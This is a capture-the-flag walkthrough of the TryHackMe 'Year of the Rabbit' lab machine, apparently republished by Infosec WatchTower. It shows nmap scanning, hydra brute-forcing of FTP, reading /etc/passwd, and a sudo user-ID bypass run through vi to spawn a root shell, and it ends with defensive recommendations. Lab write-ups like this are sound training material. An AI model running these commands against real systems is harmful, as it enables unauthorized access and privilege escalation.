Hacking, Misconfigured permissions, Sudo, Cipher
TryHackMe — Year of the Rabbit Walkthrough
A walkthrough with my tactics, techniques, and procedures.
Reconnaissance/Scanning:
Let’s start things off with a network scan to see which ports are open and the services running on each.
$ nmap -A -O -sC -sV -p- <machine_IP>
Scanning for directories with Gobuster:
Contents of /assets directory:
Contents of /css directory:
When visiting /sup3r_s3cret_fl4g.php
Okay, i’ll use the devtools to inspect this page.
That shows that the script makes the video from /assets start playing on youtube.
Now, navigating to the Network tab in devtools, I see the next place I need to look at.
When viewing that directory there’s an image file. There might be some steganography to do..
I tried using a few tools on the image file; testing for steganography and also using tools like exiftool, binwalk, and strings.
When I used strings, I found the username for the FTP server!
The possible passwords continued for a while, so I made them into a wordlist and fired up hydra to bruteforce the FTP server.
$ hydra -l ftpuser -P <password-file> <machine_IP> ftp
After logging in to the FTP server I found a text file.
I downloaded that file and viewed the contents.
At least they’re not plaintext.. Although, they are part of a cipher that’s somewhat common.
If you like to do CTFs I’m sure you know what this is.
If you don’t it’s called Brainfuck.
“Brainfuck (or BF or Brainf**k) is a minimalist programmation language that uses only eight commands to manipulate memory and perform operations.
It takes its name from two words brain and fuck, that refer to a kind of major frustration for your brain (or cerebral masturbation).”
Initial foothold:
To decode this, I went to dcode[.]fr
Now I can SSH into the machine!
Upon logging in I’m greeted with a message.
If there’s a message for another user I wonder how many other users there are, time to find out.
$ cat /etc/passwd | grep "bash"
Okay, a secret hiding place, it can’t be in the directory from earlier. I used find to see if I could locate a file with that name but that didn’t turn up anything.
Next, I tried looking for a directory named s3cr3t instead of a file. Bingo!
$ find / -type d -iname "s3cr3t" 2>/dev/null
From there I found the note!
Lateral pivoting:
And the contents of the text file are:
Now, as the user Gwendoline, I can grab the user flag.
To see what I can run as root, since I have the user’s password.
$ sudo -l
Hmm, I can run that as other users except root.
Exploit:
I tried looking for other ways to get privilege escalation and finally had to resort to uploading a copy of linpeas to the target machine and fired that off.
Visiting the link took me to a page that showed a quick command for how to exploit that version of sudo.
Privilege escalation:
Great, now that I know how to exploit sudo it’s time to escalate my privileges.
$ sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt
Then, when vi opens the file, the command is:
:!/bin/bash
With the root shell it’s now time to grab that root flag!
Reporting:
- Make sure to remove files from the web server that have sensitive information or are not in use anymore.
- Ensure correct permissions are set for users/groups and access to files/binaries on system are checked regularly.
- Keep all software, hardware and systems up to date with security patches/version updates to prevent vulnerabilities on older versions.
Note from Publication: This story was uploaded at the permission of user “xocybersec” on 2/1/24. Please direct any feedback, comments, or citations to the original writer! Thank you — Infosec WatchTower
© [2024] Infosec WatchTower. All rights reserved. Unauthorized use or reproduction of content is prohibited. For inquiries, contact Infosec WatchTower.